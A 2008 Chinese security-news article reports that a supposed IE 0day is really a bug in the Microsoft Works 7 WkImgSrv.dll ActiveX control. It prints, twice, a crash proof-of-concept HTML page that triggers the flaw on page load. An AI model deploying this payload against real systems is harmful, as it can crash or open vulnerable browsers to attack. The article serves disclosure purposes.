IE 0day漏洞 问题出自MS Works
时间:2008-09-20 13:18:52 魔新豆网
近几天网络上流传着一个传说为IE0DAY的POC代码,在XP系统环境下通杀了IE6和IE7,其它系统并未经过测试。其实这个漏洞并不是存在于IE,而是Microsoft Works的组件被挖掘出漏洞,部分的XP预装了Microsoft Works,所以就出现了过全补丁系统的漏洞(如华硕易PC 就预装了Microsoft Works)。
影响的DLL版本:Microsoft Works 7 WkImgSrv.dll (7.03.0616.0) 以下为crash POC <html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language=”JavaScript”>
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload=”JavaScript: return payload();”>
<object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”>
</object>
</body>
</html>
影响的DLL版本:Microsoft Works 7 WkImgSrv.dll (7.03.0616.0) 以下为crash POC <html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language=”JavaScript”>
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload=”JavaScript: return payload();”>
<object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”>
</object>
</body>
</html>
本文标签:
读过此篇文章的网友还读过:
- 阵容强大的十大烂片排名,《长城》出自张艺谋,《爵迹》很差劲
- 视频:苹果OS X系统再曝新漏洞,用户信息唾手可得
- 黑客如何利用文件包含漏洞进行网站入侵
- 解析暴库漏洞原理及规律
- 关于FCK编辑器漏洞爆绝对路径的问题及解决方法
- AceNet AceRepoter软件的简单漏洞分析(图文)
- Wapiti 轻量级网页安全漏洞扫描工具
- php intval()函数使用不当的安全漏洞分析
- DEDECMS网站管理系统模板执行漏洞(影响版本v5.6)
- DEDECMS 5.6最新Get Shell漏洞 DEDECMS 5.3/5.6
- DedeCms注入漏洞 影响版本5.3、5.5Posted in php
- 微软全系统建立隐藏账户漏洞分析